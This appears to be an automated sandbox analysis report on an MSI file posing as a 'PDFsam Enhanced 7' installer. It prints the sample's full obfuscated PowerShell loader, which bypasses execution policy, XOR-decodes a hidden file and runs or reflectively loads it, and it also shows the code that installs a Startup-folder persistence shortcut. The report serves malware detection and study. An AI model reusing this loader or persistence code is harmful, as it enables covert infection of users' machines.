                        Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe Mutant created: \Sessions\1\BaseNamedObjects\PDFsam Enhanced 7 Installer Mutex
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2340:120:WilError_01
                        Source: C:\Windows\System32\msiexec.exe File written: C:\Users\user\AppData\Local\Temp\cad754e2-de01-4850-9beb-b967743c5645\Repository.ini
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe File read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\ClickToRunStore\Applications
                        Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}
                        Source: Nyship-Empire-Plan-Gym-Membership.msi Static file information: File size 9105408 > 1048576
                        Source: Binary string: ?crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMcrypto\ex_data.c source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb> source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\PDFsam_Enhanced_7_Installer.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp

                        Data Obfuscation:

                        Suspicious powershell command line found
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
                        Source: MSI35C.tmp.0.dr Static PE information: section name: _RDATA
                        Source: MSI5DE.tmp.0.dr Static PE information: section name: _RDATA
                        Source: MSI60E.tmp.0.dr Static PE information: section name: _RDATA
                        Source: MSI29D3.tmp.0.dr Static PE information: section name: _RDATA
                        Source: MSID20.tmp.1.dr Static PE information: section name: _RDATA
                        Source: MSIEE6.tmp.1.dr Static PE information: section name: _RDATA
                        Source: MSIF74.tmp.1.dr Static PE information: section name: _RDATA
                        Source: MSI11D7.tmp.1.dr Static PE information: section name: _RDATA
                        Source: MSI1265.tmp.1.dr Static PE information: section name: _RDATA
                        Source: MSI1A75.tmp.1.dr Static PE information: section name: _RDATA
                        Source: MSI26BB.tmp.1.dr Static PE information: section name: _RDATA
                        Source: MSI294D.tmp.1.dr Static PE information: section name: _RDATA
                        Source: PDFsam_Enhanced_7_Installer.exe.6.dr Static PE information: real checksum: 0x101e495 should be:
                        Source: PDFsamEnhanced7Installer.exe.1.dr Static PE information: real checksum: 0x101e495 should be:
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll'
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe File created: C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe File created: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI26BB.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI11D7.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI29D3.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIEE6.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF74.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1265.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1A75.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI35C.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5DE.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI294D.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI60E.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID20.tmp

                        Boot Survival:

                        Powershell creates an autostart link
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .LNk');$a29f64734e3450b4638b662e66477.TaRgetPath=$a109bf57d3041890ad34b170ba5b0+'\'+$a4337ecc7094feb76bcc84ecefc29;$a29f64734e3450b4638b662e66477.WiNDowstYLE=7;$a29f64734e3450b4638b662e66477.SaVE();IEX $ab8a56688fd4cb9403fd73389ccef; {[char]$_} $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681(
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MIcROsOft\WinDows\sTaRT mENu\prOGrams\sTartuP\aceef8ac0de486b7cbb4c345e0d7f.LNkJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MIcROsOft\WinDows\sTaRT mENu\prOGrams\sTartuP\aceef8ac0de486b7cbb4c345e0d7f.LNkJump to behavior
                        Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 BlobJump to behavior
                        Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe TID: 5032 Thread sleep time: -60000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408 Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284 Thread sleep time: -39009s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284 Thread sleep time: -36392s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284 Thread sleep time: -33994s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -37296s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -32098s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -32299s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -31103s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -32270s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -35734s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -39621s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -39522s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -35289s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -32479s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -34481s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -35610s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -31029s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -33125s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -37808s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -38576s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -34740s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -30572s >= -30000s
                        Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI26BB.tmp
                        Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIEE6.tmp
                        Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1A75.tmp
                        Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI1265.tmp
                        Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5DE.tmp
                        Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI294D.tmp
                        Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI60E.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5636
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2034
                        Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 3174
                        Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 684
                        Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Code function: 6_2_017DB235 VirtualQuery,GetSystemInfo
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 39009
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 36392
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 33994
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 37296
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 32098
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 32299
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 31103
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 32270
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 35734
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 39621
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 39522
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 35289
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 32479
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 34481
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 35610
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 31029
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 33125
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 37808
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 38576
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 34740
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 30572
                        Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                        Source: powershell.exe, 00000015.00000002.987440827.00000273C9995000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Code function: 6_2_01894B3C mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Code function: 6_2_017EBD95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                        Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe Code function: 12_2_00BDBD95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                        HIPS / PFW / Operating System Protection Evasion:

                        Yara detected Powershell dedcode and execute
                        Source: Yara match File source: Nyship-Empire-Plan-Gym-Membership.msi, type: SAMPLE
                        Source: Yara match File source: C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt, type: DROPPED
                        Source: Yara match File source: C:\Windows\Installer\MSI113A.tmp, type: DROPPED
                        Source: Yara match File source: C:\Windows\Installer\5206a8.msi, type: DROPPED
                        Source: Yara match File source: C:\Windows\Installer\5206aa.msi, type: DROPPED
                        Bypasses PowerShell execution policy
                        Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                        Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
                        Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe'
                        Source: PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp Binary or memory string: Rrety#restartRun button clicked#more-detailsminimize#error-details#try-againD:\TemporaryBuilds\installer_builder_1\66\s\GlamInstallerCom\BalloonView.cppRestart button clicked% completeerrorview-stateDownloading OCR Edit module:Downloading OCR Search module:Downloading Main module:Downloading Edit and related modules:Installing update Edit and related modules:Installing Edit and related modules:Installing update Main module:Installing Main module:Installing update OCR Search module:Installing OCR Search module:Installing update OCR Edit module:Installing OCR Edit module:InstalledEdit - Edit and related modules are installed.InstalledMain - Main module is installed.InstalledTesseractOCR - OCR Search module is installed.InstalledOCR - OCR Edit is installed.restartappoverlay.popupShell_TrayWnd#progress-text,"
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmp Binary or memory string: Program Manager
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Binary or memory string: rety#restartRun button clicked#more-detailsminimize#error-details#try-againD:\TemporaryBuilds\installer_builder_1\66\s\GlamInstallerCom\BalloonView.cppRestart button clicked% completeerrorview-stateDownloading OCR Edit module:Downloading OCR Search module:Downloading Main module:Downloading Edit and related modules:Installing update Edit and related modules:Installing Edit and related modules:Installing update Main module:Installing Main module:Installing update OCR Search module:Installing OCR Search module:Installing update OCR Edit module:Installing OCR Edit module:InstalledEdit - Edit and related modules are installed.InstalledMain - Main module is installed.InstalledTesseractOCR - OCR Search module is installed.InstalledOCR - OCR Edit is installed.restartappoverlay.popupShell_TrayWnd#progress-text,"
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmp Binary or memory string: Progman
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.975659268.0000000002BF0000.00000002.00020000.sdmp, powershell.exe, 00000015.00000002.941289669.00000273AFC00000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                        Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
